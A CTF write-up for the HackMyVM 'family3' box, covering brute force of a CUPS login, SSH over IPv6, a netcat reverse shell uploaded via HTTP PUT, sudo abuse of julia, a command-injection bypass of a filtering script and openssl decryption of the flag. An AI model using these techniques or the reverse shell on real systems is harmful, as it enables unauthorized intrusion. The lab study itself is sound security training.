HackMyVM family3 box write-up
城南花已开

Information gathering

Service discovery

Start with a routine arp-scan to find the target's IP.

┌──(kali㉿kali)-[~/family3]
└─$ sudo arp-scan -l
[sudo] password for kali:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:c2:9e:68, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0c (Unknown: locally administered)
192.168.56.100 08:00:27:56:f5:92 PCS Systemtechnik GmbH
192.168.56.110 08:00:27:96:02:e3 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 3 responded

Scan every port with nmap.

┌──(kali㉿kali)-[~/family3]
└─$ sudo nmap -sS -sV -p- -A 192.168.56.110 -oN .family3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-03 09:19 EDT
Nmap scan report for 192.168.56.110
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
631/tcp open ipp CUPS 2.3
|_http-title: Home - CUPS 2.3.3op2
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: CUPS/2.3 IPP/2.1
MAC Address: 08:00:27:96:02:E3 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/3%OT=631%CT=1%CU=35764%PV=Y%DS=1%DC=D%G=Y%M=08002
OS:7%TM=66855021%P=x86_64-pc-linux-gnu)SEQ(SP=10A%GCD=1%ISR=10D%TI=Z%CI=Z%I
OS:I=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW
OS:7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88
OS:%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%
OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%
OS:RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.56.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.35 seconds

Ports 22 and 631 are open, and 631 appears to be serving HTTP as well.

First try ssh to port 22. It refuses the connection, so look for clues on 631 instead.

┌──(kali㉿kali)-[~/family3]
└─$ whatweb 192.168.56.110:631
http://192.168.56.110:631 [200 OK] Content-Language[en], Country[RESERVED][ZZ], HTML5, HTTPServer[CUPS/2.3 IPP/2.1], IP[192.168.56.110], Title[Home - CUPS 2.3.3op2], UncommonHeaders[accept-encoding,content-security-policy], X-Frame-Options[DENY], X-UA-Compatible[IE=9]

It is a printer service (CUPS).

On the Administration page, Add Printer requires a login.

In hindsight, a gobuster directory scan would have been worthwhile before this step.

Brute-forcing the HTTP service

So brute-force the login with Burp Suite.

The Printers page suggests the username is most likely mum.

Burp Suite was inexplicably slow at this, so switch to wfuzz.

┌──(kali㉿kali)-[~/family3]
└─$ wfuzz -c -w /usr/share/wordlists/rockyou.txt --basic mum:FUZZ -u http://192.168.56.110:631/admin -b "org.cups.sid=a2d6847dfa1a3159baaccf9c56089e18" -d "org.cups.sid=a2d6847dfa1a3159baaccf9c56089e18&OP=add-printer" -Z --hc 401
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.56.110:631/admin
Total requests: 14344392

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000015: 200 110 L 296 W 3439 Ch "lovely"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 0
Processed Requests: 38
Filtered Requests: 37
Requests/sec.: 0

That gives mum's password: lovely. My first idea was to use the printer pages to upload a webshell and go from there,

but that turned out not to be possible.

SSH access

Logging in as mum

From a foreign write-up I learned for the first time that you can ssh to a host over its IPv6 address.

The first step is to ping6 the all-nodes multicast address.

┌──(kali㉿kali)-[~/family3]
└─$ ping6 ff02::1
PING ff02::1 (ff02::1) 56 data bytes
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=1 ttl=64 time=0.731 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=2 ttl=64 time=0.032 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=3 ttl=64 time=0.032 ms
64 bytes from fe80::611e:cbee:c6ef:7352%eth1: icmp_seq=4 ttl=64 time=0.036 ms
^C
--- ff02::1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3056ms
rtt min/avg/max/mdev = 0.032/0.207/0.731/0.302 ms

A reply comes back from fe80::611e:cbee:c6ef:7352.

How do we know this IPv6 address belongs to the target?

Check with ip -6 neighbor.

For some reason mine came back empty (rebooting the target fixed it), so here I borrow the screenshot from the foreign write-up: the MAC address highlighted in yellow is the one arp-scan reported for the target's IP.

So just ssh in.

Two files in dad's home directory are readable and executable.

cat project:

mum@family:/home/dad$ cat project 
#! /bin/bash

find / -user mum -writable -exec rm {} \; 2>/dev/null
find / -user mum -type f -name -exec grep -il 'password' {} \; 2>/dev/null
find / -user mum -type f -name "id_rsa" 2>/dev/null
find / -user mum -type f -name "authorized_keys" 2>/dev/null
find / -mmin -30 -user mum 2>/dev/null | grep -v "/proc/*"
find /home/dad -type f ! -name "project" -user dad -executable -exec mv "{}" ~/survey \;
cat /var/mail/mum
cat /home/mum/.bash_history 2>/dev/null
cat /var/spool/cups/d0002*
for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done
strings /dev/mem -n100 | grep -i mum
who -u |grep mum

One line runs the scripts in the survey directory that belong to the current user:

for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done

It iterates over every file in ~/survey and executes each one that is owned by the current user; 2>/dev/null suppresses error messages.

There is an index.html in that directory, so check whether the target has any listening ports.

ss -lntp: lists all listening TCP ports, showing numeric addresses and ports and the process listening on each one.

mum@family:/home/dad/survey$ ss -lntp
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 0.0.0.0:631 0.0.0.0:*
LISTEN 0 5 127.0.0.1:8000 0.0.0.0:*
LISTEN 0 128 [::]:22 [::]:*
LISTEN 0 128 [::]:631 [::]:*

Use wget to transfer socat from the attacking machine to the target.

Use socat to expose local port 8000 on 0.0.0.0:8080.

./socat TCP-LISTEN:8080,fork TCP4:127.0.0.1:8000 &

Browse to port 8080.

It serves the index.html from dad/survey/.

Nothing useful there.

So try uploading a webshell for project to execute, but /survey belongs to dad and mum has no write access to it.

Escalating to dad

From someone else's write-up: nikto is worth a run here.

Honestly nikto is pretty old and I hardly use it anymore.

┌──(kali㉿kali)-[~]
└─$ nikto -h 192.168.56.110 -p 8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.110
+ Target Hostname: 192.168.56.110
+ Target Port: 8080
+ Start Time: 2024-07-06 09:08:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.18
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2).
+ Python/2.7.18 appears to be outdated (current is at least 3.9.6).
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8112 requests: 9 error(s) and 5 item(s) reported on remote host
+ End Time: 2024-07-06 09:09:06 (GMT-4) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto's test files ended up on the target, owned by dad.

So presumably files can be uploaded with a PUT request.

Cross-check this with a loop that tries different methods and shows the response for each.

mum@family:/home/dad/survey$ for x in GET POST PUT HEAD ; do echo "Method: $x" ; curl --head -X $x http://localhost:8000 ; done
Method: GET
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Content-type: text/html
Content-Length: 7031
Last-Modified: Mon, 17 Oct 2022 16:24:46 GMT

Method: POST
HTTP/1.0 501 Unsupported method ('POST')
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Connection: close
Content-Type: text/html

Method: PUT
curl: (52) Empty reply from server
Method: HEAD
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.18
Date: Sat, 06 Jul 2024 13:45:54 GMT
Content-type: text/html
Content-Length: 7031
Last-Modified: Mon, 17 Oct 2022 16:24:46 GMT

PUT is indeed accepted.

So use the usual netcat reverse shell.

mum@family:/tmp$ echo "nc -e /bin/bash 192.168.56.102 4444" > rev
mum@family:/tmp$ cat rev
nc -e /bin/bash 192.168.56.102 4444
mum@family:/tmp$ curl -X PUT -T rev 127.0.0.1:8000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 36 0 0 100 36 0 35 0:00:01 0:00:01 --:--:-- 35
curl: (52) Empty reply from server

Run project and get a shell as dad.

Escalating to baby

Check sudo rights with sudo -l.

dad@family:~$ sudo -l
Matching Defaults entries for dad on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dad may run the following commands on family:
(baby) NOPASSWD: /usr/bin/julia

GTFOBins has a sudo entry for julia.
dad@family:/home$ sudo -u baby /usr/bin/julia -e 'run(`/bin/sh`)' 

That gives the baby user and the first flag.

sudo rights of the baby user

Escalating to root

Information gathering

b👶by@family:~$ sudo -l
Matching Defaults entries for baby on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
(root) NOPASSWD: /home/baby/chocapic

chocapic can be run as root.

First read chocapic, then hand it to ChatGPT for an explanation.

b👶by@family:~$ cat chocapic 
#! /bin/bash
set -e

while :
do
read -ep "baby command: " cmd
[[ ! $cmd =~ ^[[:alnum:]]|^$ ]] && break
done

var=$(echo ${cmd%% *}) 2>/dev/null
[[ ${#var} -ne 1 ]] && exit 1

read -ra line <<< "$cmd"
check=${line[1]}
[[ $check =~ ^[a-z] ]] && exit 1

if ! type -t "$check" |grep ^b >/dev/null && [[ ! ${#check} -eq 1 ]] ; then exit 1 ; fi

eval "$check" 2>/dev/null
bash -c "$cmd"

Summary

This script reads user input, enforces a format on the command, and then executes it. The main checks:

  • whether the command starts with a letter or digit;
  • whether the first word of the command is exactly one character long;
  • whether the first argument is a builtin or is one character long.

If the command passes every check it is executed in a new Bash shell.

Typing ls directly did not get bash to execute it.

So I asked GPT:

Why ls gets no response

For a plain ls command:

  1. Read input

    cmd is ls, which matches [[ $cmd =~ ^[[:alnum:]] ]], so it enters the loop.

  2. Variable extraction and length check

    var=$(echo ${cmd%% *}) 2>/dev/null
    [[ ${#var} -ne 1 ]] && exit 1

    var is ls, of length 2, which does not satisfy [[ ${#var} -ne 1 ]], so the script exits.

Whereas [ : ] ; id does return output.

Why [ : ] ; id works

  1. Read input

    When [ : ] ; id is entered, cmd holds [ : ] ; id. This matches [[ $cmd =~ ^[[:alnum:]] ]] only in the sense that the regex checks whether the string starts with a letter or digit; since the entered command starts with a space, the check is skipped and the loop exits directly.

  2. Variable extraction and length check

    var=$(echo ${cmd%% *}) 2>/dev/null

    Extracts the content before the first space (that is, [), which has length 1.

  3. Command parsing and check

    read -ra line <<< "$cmd"
    check=${line[1]}
    [[ $check =~ ^[a-z] ]] && exit 1

    After parsing into the line array, line[1] is :. That is a valid builtin, so check does not satisfy [[ $check =~ ^[a-z] ]].

  4. Type check

    if ! type -t "$check" | grep ^b >/dev/null && [[ ! ${#check} -eq 1 ]]; then exit 1; fi

    type -t ":" returns builtin, so the condition is satisfied and the script does not exit.

  5. Command execution

    eval "$check" 2>/dev/null
    bash -c "$cmd"

    eval ":" runs the : builtin, then bash -c "[ : ] ; id" runs, so there is a response showing the user information.
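To make the filter logic above concrete, here is an added example (not code from the write-up or from the box) that re-expresses chocapic's checks as a function that only reports accept or reject, next to a plain allowlist check, so the two can be compared on the same inputs without executing anything. The allowlist contents are hypothetical.

```bash
#!/usr/bin/env bash
# Added example: chocapic's gate as a pure accept/reject function, plus a
# defender's allowlist for comparison. Nothing here runs the input.

# Mirrors chocapic's checks one by one. Returns 0 when the input would
# reach the eval / bash -c lines, 1 when the script would re-prompt or exit.
chocapic_accepts() {
    local cmd=$1 var check re
    local -a line
    # Loop guard: input starting with a letter or digit (or empty input)
    # is prompted for again forever, so it never reaches the later checks.
    re='^[[:alnum:]]|^$'
    [[ $cmd =~ $re ]] && return 1
    # First word must be exactly one character (e.g. "[").
    var=${cmd%% *}
    [[ ${#var} -ne 1 ]] && return 1
    # Second word must not start with a lowercase letter ...
    read -ra line <<< "$cmd"
    check=${line[1]-}
    [[ $check =~ ^[a-z] ]] && return 1
    # ... and must be a bash builtin, or be a single character.
    if ! type -t "$check" | grep -q '^b' && [[ ${#check} -ne 1 ]]; then
        return 1
    fi
    return 0
}

# Defender's counterpart (hypothetical allowlist): match the whole string
# against fixed commands and never hand it to eval or bash -c.
allowlist_accepts() {
    local cmd=$1 allowed
    for allowed in 'id' 'uptime' 'df -h'; do
        [[ $cmd == "$allowed" ]] && return 0
    done
    return 1
}

# Constructed inputs: the ones from the write-up plus a few variations.
for input in 'ls' 'id' '[ ls' '[ : ] ; id' '[ : ] ; cat /root/root.txt'; do
    chocapic_accepts "$input" && c=accept || c=reject
    allowlist_accepts "$input" && a=accept || a=reject
    printf '%-28s chocapic=%s allowlist=%s\n' "$input" "$c" "$a"
done
```

The output shows why a first-character regex plus a builtin test is not a command allowlist: ls and id are rejected while the `[ : ] ; ...` forms, which carry an arbitrary command after the semicolon, are accepted.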

Use chocapic to read /root/root.txt.

b👶by@family:~$ sudo ./chocapic 
baby command: [ : ] ; cat /root/root.txt
Salted__"�1լ���Ȉ�m�:Pi�|q�8FH�yNU:k�.ᛥ�24�}��;E�$/7b👶by@family:~$

The output is garbage; the leading Salted__ suggests it is encrypted with a salt.

I had to look at the write-up again; forgive my noob-ness.

root@family:/home/baby# file /root/root.txt   # check what kind of file root.txt is
/root/root.txt: openssl enc'd data with salted password
root@family:/home/baby# lsblk   # the password turns out to be hidden on the sda3 partition
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 15.3G 0 disk
├─sda1 8:1 0 13.3G 0 part /
├─sda2 8:2 0 1K 0 part
├─sda3 8:3 0 1G 0 part
└─sda5 8:5 0 976M 0 part [SWAP]
root@family:/home/baby# mount /dev/sda3 /mnt/   # mount sda3 on /mnt
root@family:/home/baby# cat /mnt/password   # read the password
QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
root@family:/home/baby# echo "QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma">/root/pass

openssl decryption

Asked GPT how to decrypt it with openssl.

Example explained

  1. openssl enc -d -aes-256-cbc: select decryption mode and specify the aes-256-cbc algorithm.
  2. -in encrypted_file.enc: the input file to decrypt, encrypted_file.enc.
  3. -out decrypted_file.txt: the output file for the decrypted data, decrypted_file.txt.
  4. -pass pass:mysecretpassword: use mysecretpassword as the decryption password.
root@family:~# openssl enc -aes128 -pbkdf2 -d -in root.txt -pass pass:QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
8d8ff4976efccbfc8ff7d7554b9239e5
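As an added example (not from the write-up), the following builds a file like /root/root.txt from constructed data, checks for the 8-byte "Salted__" magic that `file` keys on and that showed up in the garbled cat output, and decrypts it with the same cipher and KDF options used above. The password and plaintext are constructed; the temp directory is created with mktemp.

```bash
#!/usr/bin/env bash
# Added example: reproduce an OpenSSL enc'd file with a salted password,
# recognise it by its magic bytes, and decrypt it with the write-up's flags.
set -u

# True when the file starts with the OpenSSL salted-enc header. OpenSSL
# writes the literal "Salted__" followed by an 8-byte salt before the ciphertext.
is_openssl_salted() {
    [ "$(head -c 8 "$1")" = "Salted__" ]
}

# Encrypt $1 into $2 with password $3, same cipher and KDF as on the box.
encrypt_file() {
    openssl enc -aes128 -pbkdf2 -salt -in "$1" -out "$2" -pass "pass:$3"
}

# Decrypt $1 to stdout with password $2; mirrors the write-up's command.
decrypt_file() {
    openssl enc -aes128 -pbkdf2 -d -in "$1" -pass "pass:$2"
}

# Round trip on constructed data; prints the recovered plaintext, returns
# non-zero if encryption, the magic check or decryption fails.
demo_roundtrip() {
    local dir plain
    dir=$(mktemp -d)
    printf 'constructed-flag-value\n' > "$dir/plain.txt"
    encrypt_file "$dir/plain.txt" "$dir/root.txt" 'constructed-password' || return 1
    # Everything after the 16-byte header is binary, which is why cat on
    # the box printed garbage after "Salted__".
    is_openssl_salted "$dir/root.txt" || return 1
    plain=$(decrypt_file "$dir/root.txt" 'constructed-password') || return 1
    rm -rf "$dir"
    printf '%s\n' "$plain"
}

demo_roundtrip
```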

Done. I really did not see the root decryption step coming; it was nasty.